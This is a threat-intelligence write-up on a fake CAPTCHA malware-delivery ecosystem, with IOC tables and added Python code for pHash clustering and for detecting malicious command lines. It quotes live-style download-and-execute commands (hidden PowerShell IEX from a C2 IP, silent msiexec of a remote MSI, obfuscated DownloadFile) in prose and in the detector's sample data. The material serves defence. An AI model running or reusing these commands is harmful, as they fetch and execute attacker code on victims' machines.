Censys has documented a fake CAPTCHA ecosystem that spreads malware by imitating trusted web verification pages. Far from a single campaign, it masks a variety of delivery methods behind visually identical lures, most often mimicking Cloudflare-style challenges. By abusing familiar browser workflows, attackers bypass defenses without directly compromising any service.
The analysis, based on 9,494 tracked assets, shows that perceptual hashing (pHash) places 70% of them in a single dominant visual cluster, while execution varies widely, from clipboard-pasted scripts to fileless push notifications. This "Living Off the Web" tactic decouples the trust-gaining interface from the payload, which makes detection keyed on any one payload unreliable. Users see a standard "browser verification" page; behind it sit incompatible execution models: VBScript downloaders, MSI installers and the Matrix Push C2 framework.
The lure is a reusable layer available to any operator; it is not tied to a single malware family.

Key findings and delivery methods

Censys rendered each page with Playwright in a sandbox and took screenshots for pHash clustering, using a Hamming distance threshold of six. Cluster 0 holds 6,686 assets (70%) and uses site-specific favicons to look legitimate.

Figure: a typical fake CAPTCHA lure followed by a ClickFix lure (source: Censys)
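The pHash clustering step above, as an added example (not Censys's code): a pure-Python pHash (box downscale to 32x32, 2D DCT, 8x8 low-frequency block, threshold on the median of the AC terms) and a Hamming-distance grouping at the threshold of six. The sample "screenshots" are constructed noise images built inside the block, the single-linkage union-find grouping rule is an assumption because the page does not say how Censys formed clusters, and the brightness-shifted copy is there to show which kind of re-host pHash treats as the same lure.

```python
"""Perceptual-hash clustering of lure screenshots (added example, not Censys's code).

Implements pHash in pure Python: downscale to 32x32 grayscale, take the 2D DCT,
keep the top-left 8x8 block, compare each coefficient with the median of the
63 AC terms, and pack the 64 bits into an int. Hashes within THRESHOLD bits of
each other (Hamming distance <= 6, the analysis's threshold) join one cluster.
Images are constructed in-line as lists of rows of 8-bit values. Single-linkage
clustering via union-find is an assumption, not the page's stated method.
"""
import math
import random

HASH_SIZE = 8      # 8x8 low-frequency block -> 64-bit hash
DCT_SIZE = 32      # downscale target before the DCT
THRESHOLD = 6      # max Hamming distance for two hashes to share a cluster


def downscale(img, size=DCT_SIZE):
    """Box-average an HxW grayscale image (list of rows, H and W >= size) to size x size."""
    h, w = len(img), len(img[0])
    out = []
    for y in range(size):
        y0, y1 = y * h // size, max((y + 1) * h // size, y * h // size + 1)
        row = []
        for x in range(size):
            x0, x1 = x * w // size, max((x + 1) * w // size, x * w // size + 1)
            block = [img[yy][xx] for yy in range(y0, y1) for xx in range(x0, x1)]
            row.append(sum(block) / len(block))
        out.append(row)
    return out


def dct_2d(m):
    """Orthonormal 2D DCT-II of an NxN matrix, computed separably (rows, then columns)."""
    n = len(m)
    cos = [[math.cos(math.pi * (2 * x + 1) * u / (2 * n)) for x in range(n)] for u in range(n)]
    scale = [math.sqrt(1 / n)] + [math.sqrt(2 / n)] * (n - 1)
    rows = [[scale[u] * sum(m[y][x] * cos[u][x] for x in range(n)) for u in range(n)] for y in range(n)]
    return [[scale[v] * sum(rows[y][u] * cos[v][y] for y in range(n)) for u in range(n)] for v in range(n)]


def phash(img):
    """64-bit pHash: bit = 1 where a low-frequency DCT coefficient exceeds the AC median."""
    coeffs = dct_2d(downscale(img))
    low = [coeffs[v][u] for v in range(HASH_SIZE) for u in range(HASH_SIZE)]
    ac = sorted(low[1:])                     # drop the DC term when choosing the median
    mid = len(ac) // 2
    median = ac[mid] if len(ac) % 2 else (ac[mid - 1] + ac[mid]) / 2
    bits = 0
    for c in low:                            # DC term included in the hash, as in pHash
        bits = (bits << 1) | (1 if c > median else 0)
    return bits


def hamming(a, b):
    """Number of differing bits between two hashes."""
    return bin(a ^ b).count("1")


def cluster(hashes, threshold=THRESHOLD):
    """Single-linkage grouping: any pair within `threshold` bits lands in the same cluster.
    Returns clusters as lists of input indices, largest first (ties keep input order)."""
    parent = list(range(len(hashes)))

    def find(i):
        while parent[i] != i:
            parent[i] = parent[parent[i]]
            i = parent[i]
        return i

    for i in range(len(hashes)):
        for j in range(i + 1, len(hashes)):
            if hamming(hashes[i], hashes[j]) <= threshold:
                parent[find(i)] = find(j)
    groups = {}
    for i in range(len(hashes)):
        groups.setdefault(find(i), []).append(i)
    return sorted(groups.values(), key=len, reverse=True)


def make_image(seed, size=64, lo=30, hi=200, offset=0):
    """Constructed sample 'screenshot': seeded noise, optionally brightness-shifted."""
    rng = random.Random(seed)
    return [[rng.randint(lo, hi) + offset for _ in range(size)] for _ in range(size)]


def demo():
    """Hash three constructed pages and cluster them; returns (hashes, clusters)."""
    lure = make_image(seed=1)                     # a lure page
    lure_rehost = make_image(seed=1, offset=40)   # same page, re-hosted with a brighter theme
    other = make_image(seed=2)                    # an unrelated page
    hashes = [phash(lure), phash(lure_rehost), phash(other)]
    return hashes, cluster(hashes)


if __name__ == "__main__":
    hs, cs = demo()
    for h in hs:
        print(f"{h:016x}")
    print(cs)
```

The brightness shift changes only the DC coefficient, so the two copies of the lure hash identically and share a cluster, while the unrelated page lands roughly 32 bits away. Note that single linkage chains: hashes 6 bits apart on either side of a third can pull clusters together, which is one reason visually similar pages deserve the infrastructure-and-behaviour split the analysis applies on top of the visual grouping.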
Of the 5,441 assets whose payloads could be examined, 32 payload variants appeared across the silos. Clipboard-driven execution dominates, with 3,227 assets. VBScript loaders (1,706) fetch remote scripts with commands such as:

powershell.exe -w hidden -ep bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://95[.]164.53.115:5506/a.ps1')"

PowerShell DownloadFile variants (1,269) call Net.WebClient.DownloadFile, frequently hiding the method name with string concatenation or other obfuscation. Rarer MSHTA and BAT variants also appear.
MSI installer delivery (1,212 assets) avoids scripts entirely with a command such as msiexec /i http://compromised-domain[.]com/verification/check.msi /quiet. On compromised websites the payloads hide under "human verification" paths.
Matrix Push C2 (1,281 assets) performs a fileless handoff: Notifications.js prompts for Chrome notification permission, leaving no clipboard artifact, and the pushes come later from the server at matrix.cymru. Admin panels reveal lure templates that resemble Cloudflare and redirect after the user clicks "Allow."

Figure: an illustration of the pipeline, drawn for this analysis (source: Censys)

The infrastructure silos confirm the fragmentation: PowerShell points to ghost.nestdns[.]com, MSI to various compromised domains, and VBScript to 95[.]164.53.115:5506 and 78[.]40.209.164:5506. With no overlap between models, independent operators are reusing the same interface.
IOCs and defender suggestions

Category | IOC examples
C2 servers | 95.164.53.115:5506, 78.40.209.164:5506, matrix.cymru
Domains | ghost.nestdns.com, penguinpublishers.org
Payload URLs | http://compromised-domain[.]com/verification/check.msi
Scripts | Notifications.js (Matrix integration), http://95[.]164.53.115:5506/a.ps1, VBS/PowerShell clipboard commands with "-ep bypass"
Behaviors | pHash clusters imitating Cloudflare; post-verification notification prompts; msiexec calls

Defenders need to move past clipboard scans, which miss 14.4% of Cluster 0.
Watch for the Sankey-linked execution flows, notification grants that follow security pages, and verification lures that appear out of context. Visual similarity defeats attribution; cluster by infrastructure and behavior instead. Censys now captures screenshots automatically, and its fake CAPTCHA tracking can be used for ongoing monitoring.
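A detection sketch for the execution models and the defender suggestions above, as an added example rather than code from Censys or the page: it classifies process command lines into the delivery models the analysis counts, undoes the string-concatenation and backtick obfuscation the DownloadFile variants use, and correlates a browser notification grant with a preceding verification-style page, the Matrix Push handoff that leaves no clipboard artifact. The log lines, the example.invalid and news.example hostnames, the 60-second window and the title regex are constructed assumptions; the IP, URL and domains are the page's own indicators.

```python
"""Execution-model classifier plus notification-grant correlation (added example).

Not Censys's code. Part one maps process command lines onto the delivery
models the analysis counts (DownloadString loader, DownloadFile loader, MSHTA,
BAT, MSI via msiexec) after stripping cheap PowerShell obfuscation. Part two
flags a notification permission grant that follows a verification-looking page
within a short window. Sample commands, events, hostnames and the 60-second
window are constructed for the example.
"""
import re
from datetime import datetime, timedelta

# Ordered: the first pattern that matches names the model.
MODELS = [
    ("downloadstring-loader", re.compile(r"downloadstring", re.I)),
    ("downloadfile-loader",   re.compile(r"downloadfile", re.I)),
    ("mshta",                 re.compile(r"\bmshta(\.exe)?\b", re.I)),
    ("msi-installer",         re.compile(r"\bmsiexec(\.exe)?\b.*?/i\s+https?://", re.I)),
    ("bat",                   re.compile(r"\bcmd(\.exe)?\b.*\.bat\b", re.I)),
]

# Secondary indicators worth surfacing alongside the model.
FLAGS = [
    ("hidden-window", re.compile(r"-w(indowstyle)?\s+hidden", re.I)),
    ("ep-bypass",     re.compile(r"-e(xecutionpolicy|p)\s+bypass", re.I)),
    ("iex",           re.compile(r"\biex\b|invoke-expression", re.I)),
    ("quiet",         re.compile(r"/quiet\b", re.I)),
]

CONCAT = re.compile(r"""['"]\s*\+\s*['"]""")   # matches the '+' joining 'Down'+'loadFile'


def normalize(cmd):
    """Undo backtick escapes and 'a'+'b' string concatenation so keywords reappear."""
    return CONCAT.sub("", cmd.replace("`", ""))


def classify(cmdline):
    """Return the delivery model, secondary flags and whether the model is script-free."""
    norm = normalize(cmdline)
    model = next((name for name, rx in MODELS if rx.search(norm)), "unknown")
    flags = [name for name, rx in FLAGS if rx.search(norm)]
    return {"model": model, "flags": flags, "script_free": model == "msi-installer"}


# Constructed process command lines; indicators reuse the ones from the text.
SAMPLE_COMMANDS = [
    'powershell.exe -w hidden -ep bypass -c "IEX (New-Object Net.WebClient).DownloadString(\'http://95.164.53.115:5506/a.ps1\')"',
    "powershell -ep bypass -c \"(New-Object Net.WebClient).('Down'+'loadFile')('http://ghost.nestdns.com/x.exe','C:\\Users\\Public\\x.exe')\"",
    "msiexec /i http://compromised-domain.com/verification/check.msi /quiet",
    "mshta http://example.invalid/verify.hta",
    "cmd /c C:\\Users\\Public\\verify.bat",
    "notepad.exe C:\\notes.txt",
]

VERIFY_TITLE = re.compile(r"verify|verification|checking your browser|human", re.I)


def notification_after_verification(events, window=timedelta(seconds=60)):
    """events: (timestamp, kind, origin, detail). Return origins where a
    'notification_granted' follows a verification-looking 'page_view' within `window`."""
    recent = {}   # origin -> time of its last verification-looking page view
    hits = []
    for ts, kind, origin, detail in sorted(events):
        if kind == "page_view" and VERIFY_TITLE.search(detail):
            recent[origin] = ts
        elif kind == "notification_granted" and origin in recent and ts - recent[origin] <= window:
            hits.append(origin)
    return hits


T0 = datetime(2025, 1, 1, 12, 0, 0)   # constructed timestamps
SAMPLE_EVENTS = [
    (T0, "page_view", "https://penguinpublishers.org", "Verify you are human"),
    (T0 + timedelta(seconds=8), "notification_granted", "https://penguinpublishers.org", "Notifications.js"),
    (T0 + timedelta(minutes=5), "page_view", "https://news.example", "Front page"),
    (T0 + timedelta(minutes=5, seconds=3), "notification_granted", "https://news.example", ""),
    (T0 + timedelta(minutes=10), "page_view", "https://shop.example", "Checking your browser"),
    (T0 + timedelta(minutes=20), "notification_granted", "https://shop.example", ""),   # outside window
]


if __name__ == "__main__":
    for cmd in SAMPLE_COMMANDS:
        print(classify(cmd), cmd[:60])
    print(notification_after_verification(SAMPLE_EVENTS))
```

The second command line is the case a naive keyword scan misses: the method name is split across two string literals, so matching runs only after normalization. The msiexec line and the notification grant are the two paths that carry no script at all, which is why the classifier labels the MSI model script-free and why the event correlation exists separately from the command-line check.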
This ecosystem is built on conditioned trust in web UX. Expect more fileless pivots as scripting defenses harden.